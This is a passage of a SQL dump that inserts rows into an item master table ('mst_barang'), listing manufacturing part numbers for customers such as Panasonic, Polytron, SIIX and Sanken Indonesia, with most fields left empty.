'LSEK0943', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0020', '11', '', 'LSEK0944', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0021', '11', '', 'LSEK0945', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0022', '11', '', 'LSEK0946', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0023', '11', '', 'LSEK0964', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0024', '11', '', 'LSEK0970', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0025', '11', '', 'LSEK0972', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0026', '11', '', 'LSSC0766', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0027', '11', '', 'LSSC0796', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0028', '11', '', 'LSSC0797', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0029', '11', '', 'LSSC0798', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0030', '11', '', 'LSSC0799', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0031', '11', '', 'LSSC0800', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0032', '11', '', 'LSSC0812-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0033', '11', '', 'LSSC0814', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0034', '11', '', 'LSSC0815', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0035', '11', '', 'LSSC0816', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0036', '11', '', 'LSSC0817', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0037', '11', '', 'LSSC0657', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0038', '11', '', 'LSSC1116', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0039', '11', '', 'AL BLANK SHEET A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0040', '11', '', 'AL BLANK SHEET B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0041', '11', '', 'AL BLANK SHEET C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0042', '11', '', 'AL BLANK SHEET D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0043', '11', '', 'AL BLANK SHEET E', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPH-0044', '11', '', 'AL BLANK SHEET F', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('WPM-0001', '11', '', 'RMYN0017', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPM-0002', '11', '', 'RMYN0018', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPM-0003', '11', '', 'RMYN0018 ( Tembaga )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPM-0004', '11', '', 'RMYN0018 ( Platting )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPM-0005', '11', '', 'RMYN0018A-1 ( Tembaga+ ED Coating )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPM-0006', '11', '', 'RMYN0019', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPM-0007', '11', '', 'TUC4N07300', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPM-0008', '11', '', 'TUC4N07301', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPM-0009', '11', '', 'TUC4N07400', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('WPT-0001', '11', '', 'DN31A367MOI', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('WPT-0002', '11', '', 'PN2201143', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('WPT-0003', '11', '', 'DN34D062', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('WPT-0004', '11', '', 'PN2201225 tskanan', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('WPT-0005', '11', '', 'PN2201225 tskiri', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('WSE-0001', '11', '', 'CF12C Heat sink', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SIIX EMS INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0001', '11', '', 'AP43456-125-02D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0002', '11', '', 'AP47039-275-12', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0003', '11', '', 'APB42200-502A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0004', '11', '', 'APB42200-508', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0005', '11', '', 'APC32000-510B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0006', '11', '', 'APC32000-512A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0007', '11', '', 'APC42200-503A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0008', '11', '', 'APC42200-525', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0009', '11', '', 'APC42200-530C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0010', '11', '', 'APC42200-541', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0011', '11', '', 'APC42200-542', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0012', '11', '', 'APC42200-543', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0013', '11', '', 'APC46100-501A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0014', '11', '', 'APC46400-502A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0015', '11', '', 'APC47100-501B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0016', '11', '', 'APE46100-537', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0017', '11', '', 'APH24000-023E', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0018', '11', '', 'APH24000-504E', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0019', '11', '', 'APH24000-506', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0020', '11', '', 'APH24000-507', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0021', '11', '', 'APH24400-501A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0022', '11', '', 'APH24400-502', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0023', '11', '', 'APH24400-502A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0024', '11', '', 'APH34000-109A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0025', '11', '', 'APH34000-504B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0026', '11', '', 'APH34000-506C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0027', '11', '', 'APH34000-530(Thernsheet)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0028', '11', '', 'APH34000-540', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0029', '11', '', 'APH34000-555/APH34000-555A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0030', '11', '', 'APH34000-556A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0031', '11', '', 'APH34000-561EThernsheet besar', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0032', '11', '', 'APH34000-561EThernsheetkecil', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0033', '11', '', 'APH34000-567A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0034', '11', '', 'APH34000-567AECOTORIO', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0035', '11', '', 'APH34000-583A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0036', '11', '', 'APH34000-590', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0037', '11', '', 'APH34000-598', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0038', '11', '', 'APH34000-646', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0039', '11', '', 'APH34000-647', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0040', '11', '', 'APH34000-658', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0041', '11', '', 'APH34000-701-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0042', '11', '', 'APH34000-733', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0043', '11', '', 'APH34000-737', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0044', '11', '', 'APH34000-738A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0045', '11', '', 'APH34000-759MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0046', '11', '', 'APH34000-832-A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0047', '11', '', 'APH34000-855-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0048', '11', '', 'APH34100-526C(Thernsheetkecil)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0049', '11', '', 'APH34100-526D(thernsheetbesar)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0050', '11', '', 'APH34100-549A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0051', '11', '', 'APH34100-551', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0052', '11', '', 'APH34100-557', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0053', '11', '', 'APH34100-558', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0054', '11', '', 'APH34200-307C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0055', '11', '', 'APH34200-308', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0056', '11', '', 'APH34200-518', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0057', '11', '', 'APH34200-599A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0058', '11', '', 'APH34200-601A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0059', '11', '', 'APH34200-606', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0060', '11', '', 'APH34200-625A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0061', '11', '', 'APH34200-641', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0062', '11', '', 'APH34200-642A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0063', '11', '', 'APH34200-643A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0064', '11', '', 'APH34200-644B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0065', '11', '', 'APH34200-645A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0066', '11', '', 'APH34200-646', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0067', '11', '', 'APH34200-650C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0068', '11', '', 'APH34200-667B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0069', '11', '', 'APH34200-669', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0070', '11', '', 'APH34200-670', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0071', '11', '', 'APH34300-525C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0072', '11', '', 'APH34400-564', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0073', '11', '', 'APH36300-501A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0074', '11', '', 'APH36300-503', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0075', '11', '', 'APH42100-504', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0076', '11', '', 'APH42100-506A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0077', '11', '', 'APH42300-502C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0078', '11', '', 'APH44000-175Bthernsheet', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0079', '11', '', 'APH44000-513A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0080', '11', '', 'APH44000-515/APH44000-515A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0081', '11', '', 'APH44000-551/APH44000-551A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0082', '11', '', 'APH44000-586', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0083', '11', '', 'APH44000-591', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0084', '11', '', 'APH44000-599/APH4000-599A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0085', '11', '', 'APH44000-630C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0086', '11', '', 'APH44000-631D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0087', '11', '', 'APH44000-635B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0088', '11', '', 'APH44000-636', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0089', '11', '', 'APH44000-637', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0090', '11', '', 'APH44000-637B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0091', '11', '', 'APH44000-638B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0092', '11', '', 'APH44000-651BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0093', '11', '', 'APH44000-652BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0094', '11', '', 'APH44000-682', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0095', '11', '', 'APH44000-688ECOTORIO', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0096', '11', '', 'APH44000-710/APH44000-710A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0097', '11', '', 'APH44000-738', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0098', '11', '', 'APH44000-739', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0099', '11', '', 'APH44000-742-A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0100', '11', '', 'APH44000-746A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0101', '11', '', 'APH44000-751', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0102', '11', '', 'APH44000-754', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0103', '11', '', 'APH44000-759MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0104', '11', '', 'APH44000-759WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0105', '11', '', 'APH44000-760MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0106', '11', '', 'APH44000-760WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0107', '11', '', 'APH44000-761MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0108', '11', '', 'APH44000-737', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0109', '11', '', 'APH44000-773', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0110', '11', '', 'APH44000-780-1', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0111', '11', '', 'APH44000-785', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0112', '11', '', 'APH44000-790-1BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0113', '11', '', 'APH44000-791-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0114', '11', '', 'APH44000-792-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0115', '11', '', 'APH44000-797-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0116', '11', '', 'APH44000-809-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0117', '11', '', 'APH44000-809-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0118', '11', '', 'APH44000-810', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0119', '11', '', 'APH44000-814-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0120', '11', '', 'APH44000-814-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0121', '11', '', 'APH44000-815-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0122', '11', '', 'APH44000-815-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0123', '11', '', 'APH44000-817A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0124', '11', '', 'APH44000-819', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0125', '11', '', 'APH44000-820', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN 